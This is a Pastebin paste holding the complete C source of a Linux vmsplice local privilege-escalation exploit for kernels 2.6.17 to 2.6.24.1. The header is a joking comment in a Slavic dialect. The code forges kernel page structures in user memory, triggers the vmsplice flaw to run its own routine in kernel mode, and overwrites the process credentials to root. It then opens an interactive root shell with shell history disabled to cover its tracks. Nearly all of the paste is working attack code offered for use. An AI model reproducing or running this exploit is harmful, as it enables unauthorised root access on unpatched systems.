API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 26th, 2017
60
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.55 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.  * jessica_biel_naked_in_my_bed.c
  3.  *
  4.  * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
  5.  * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
  6.  * Stejnak je to stare jak cyp a aj jakesyk rozbite.
  7.  *
  8.  * Linux vmsplice Local Root Exploit
  9.  * By qaaz
  10.  *
  11.  * Linux 2.6.17 - 2.6.24.1
  12.  *
  13.  * This is quite old code and I had to rewrite it to even compile.
  14.  * It should work well, but I don't remeber original intent of all
  15.  * the code, so I'm not 100% sure about it. You've been warned ;)
  16.  *
  17.  * -static -Wno-format  
  18.  */
  19. #define _GNU_SOURCE
  20. #include <stdio.h>
  21. #include <errno.h>
  22. #include <stdlib.h>
  23. #include <string.h>
  24. #include <malloc.h>
  25. #include <limits.h>
  26. #include <signal.h>
  27. #include <unistd.h>
  28. #include <sys/uio.h>
  29. #include <sys/mman.h>
  30. #include <asm/page.h>
  31. #define __KERNEL__
  32. #include <asm/unistd.h>
  33.  
  34. #define PIPE_BUFFERS    16
  35. #define PG_compound 14
  36. #define uint        unsigned int
  37. #define static_inline   static inline __attribute__((always_inline))
  38. #define STACK(x)    (x + sizeof(x) - 40)
  39.  
  40. #define PAGE_SHIFT      12
  41. #ifdef __ASSEMBLY__
  42. #define PAGE_SIZE       (1 << PAGE_SHIFT)
  43. #else
  44. #define PAGE_SIZE       (1UL << PAGE_SHIFT)
  45. #endif
  46.  
  47. struct page {
  48.     unsigned long flags;
  49.     int count;
  50.     int mapcount;
  51.     unsigned long private;
  52.     void *mapping;
  53.     unsigned long index;
  54.     struct { long next, prev; } lru;
  55. };
  56.  
  57. void    exit_code();
  58. char    exit_stack[1024 * 1024];
  59.  
  60. void    die(char *msg, int err)
  61. {
  62.     printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
  63.     fflush(stdout);
  64.     fflush(stderr);
  65.     exit(1);
  66. }
  67.  
  68. #if defined (__i386__)
  69.  
  70. #ifndef __NR_vmsplice
  71. #define __NR_vmsplice   316
  72. #endif
  73.  
  74. #define USER_CS     0x73
  75. #define USER_SS     0x7b
  76. #define USER_FL     0x246
  77.  
  78. static_inline
  79. void    exit_kernel()
  80. {
  81.     __asm__ __volatile__ (
  82.     "movl %0, 0x10(%%esp) ;"
  83.     "movl %1, 0x0c(%%esp) ;"
  84.     "movl %2, 0x08(%%esp) ;"
  85.     "movl %3, 0x04(%%esp) ;"
  86.     "movl %4, 0x00(%%esp) ;"
  87.     "iret"
  88.     : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  89.         "i" (USER_CS), "r" (exit_code)
  90.     );
  91. }
  92.  
  93. static_inline
  94. void *  get_current()
  95. {
  96.     unsigned long curr;
  97.     __asm__ __volatile__ (
  98.     "movl %%esp, %%eax ;"
  99.     "andl %1, %%eax ;"
  100.     "movl (%%eax), %0"
  101.     : "=r" (curr)
  102.     : "i" (~8191)
  103.     );
  104.     return (void *) curr;
  105. }
  106.  
  107. #elif defined (__x86_64__)
  108.  
  109. #ifndef __NR_vmsplice
  110. #define __NR_vmsplice   278
  111. #endif
  112.  
  113. #define USER_CS     0x23
  114. #define USER_SS     0x2b
  115. #define USER_FL     0x246
  116.  
  117. static_inline
  118. void    exit_kernel()
  119. {
  120.     __asm__ __volatile__ (
  121.     "swapgs ;"
  122.     "movq %0, 0x20(%%rsp) ;"
  123.     "movq %1, 0x18(%%rsp) ;"
  124.     "movq %2, 0x10(%%rsp) ;"
  125.     "movq %3, 0x08(%%rsp) ;"
  126.     "movq %4, 0x00(%%rsp) ;"
  127.     "iretq"
  128.     : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  129.         "i" (USER_CS), "r" (exit_code)
  130.     );
  131. }
  132.  
  133. static_inline
  134. void *  get_current()
  135. {
  136.     unsigned long curr;
  137.     __asm__ __volatile__ (
  138.     "movq %%gs:(0), %0"
  139.     : "=r" (curr)
  140.     );
  141.     return (void *) curr;
  142. }
  143.  
  144. #else
  145. #error "unsupported arch"
  146. #endif
  147.  
  148. #if defined (_syscall4)
  149. #define __NR__vmsplice  __NR_vmsplice
  150. _syscall4(
  151.     long, _vmsplice,
  152.     int, fd,
  153.     struct iovec *, iov,
  154.     unsigned long, nr_segs,
  155.     unsigned int, flags)
  156.  
  157. #else
  158. #define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
  159. #endif
  160.  
  161. static uint uid, gid;
  162.  
  163. void    kernel_code()
  164. {
  165.     int i;
  166.     uint    *p = get_current();
  167.  
  168.     for (i = 0; i < 1024-13; i++) {
  169.         if (p[0] == uid && p[1] == uid &&
  170.             p[2] == uid && p[3] == uid &&
  171.             p[4] == gid && p[5] == gid &&
  172.             p[6] == gid && p[7] == gid) {
  173.             p[0] = p[1] = p[2] = p[3] = 0;
  174.             p[4] = p[5] = p[6] = p[7] = 0;
  175.             p = (uint *) ((char *)(p + 8) + sizeof(void *));
  176.             p[0] = p[1] = p[2] = ~0;
  177.             break;
  178.         }
  179.         p++;
  180.     }  
  181.  
  182.     exit_kernel();
  183. }
  184.  
  185. void    exit_code()
  186. {
  187.     if (getuid() != 0)
  188.         die("wtf", 0);
  189.  
  190.     printf("[+] root\n");
  191.     putenv("HISTFILE=/dev/null");
  192.     execl("/bin/bash", "bash", "-i", NULL);
  193.     die("/bin/bash", errno);
  194. }
  195.  
  196. int main(int argc, char *argv[])
  197. {
  198.     int     pi[2];
  199.     size_t      map_size;
  200.     char *      map_addr;
  201.     struct iovec    iov;
  202.     struct page *   pages[5];
  203.  
  204.     uid = getuid();
  205.     gid = getgid();
  206.     setresuid(uid, uid, uid);
  207.     setresgid(gid, gid, gid);
  208.  
  209.     printf("-----------------------------------\n");
  210.     printf(" Linux vmsplice Local Root Exploit\n");
  211.     printf(" By qaaz\n");
  212.     printf("-----------------------------------\n");
  213.  
  214.     if (!uid || !gid)
  215.         die("!@#$", 0);
  216.  
  217.     /*****/
  218.     pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
  219.     pages[1] = pages[0] + 1;
  220.  
  221.     map_size = PAGE_SIZE;
  222.     map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
  223.                     MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  224.     if (map_addr == MAP_FAILED)
  225.         die("mmap", errno);
  226.  
  227.     memset(map_addr, 0, map_size);
  228.     printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  229.     printf("[+] page: 0x%lx\n", pages[0]);
  230.     printf("[+] page: 0x%lx\n", pages[1]);
  231.  
  232.     pages[0]->flags    = 1 << PG_compound;
  233.     pages[0]->private  = (unsigned long) pages[0];
  234.     pages[0]->count    = 1;
  235.     pages[1]->lru.next = (long) kernel_code;
  236.  
  237.     /*****/
  238.     pages[2] = *(void **) pages[0];
  239.     pages[3] = pages[2] + 1;
  240.  
  241.     map_size = PAGE_SIZE;
  242.     map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
  243.                     MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  244.     if (map_addr == MAP_FAILED)
  245.         die("mmap", errno);
  246.  
  247.     memset(map_addr, 0, map_size);
  248.     printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  249.     printf("[+] page: 0x%lx\n", pages[2]);
  250.     printf("[+] page: 0x%lx\n", pages[3]);
  251.  
  252.     pages[2]->flags    = 1 << PG_compound;
  253.     pages[2]->private  = (unsigned long) pages[2];
  254.     pages[2]->count    = 1;
  255.     pages[3]->lru.next = (long) kernel_code;
  256.  
  257.     /*****/
  258.     pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
  259.     map_size = PAGE_SIZE;
  260.     map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
  261.                     MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  262.     if (map_addr == MAP_FAILED)
  263.         die("mmap", errno);
  264.     memset(map_addr, 0, map_size);
  265.     printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  266.     printf("[+] page: 0x%lx\n", pages[4]);
  267.  
  268.     /*****/
  269.     map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
  270.     map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
  271.                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  272.     if (map_addr == MAP_FAILED)
  273.         die("mmap", errno);
  274.  
  275.     memset(map_addr, 0, map_size);
  276.     printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  277.  
  278.     /*****/
  279.     map_size -= 2 * PAGE_SIZE;
  280.     if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
  281.         die("munmap", errno);
  282.  
  283.     /*****/
  284.     if (pipe(pi) < 0) die("pipe", errno);
  285.     close(pi[0]);
  286.  
  287.     iov.iov_base = map_addr;
  288.     iov.iov_len  = ULONG_MAX;
  289.  
  290.     signal(SIGPIPE, exit_code);
  291.     _vmsplice(pi[1], &iov, 1, 0);
  292.     die("vmsplice", errno);
  293.     return 0;
  294. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!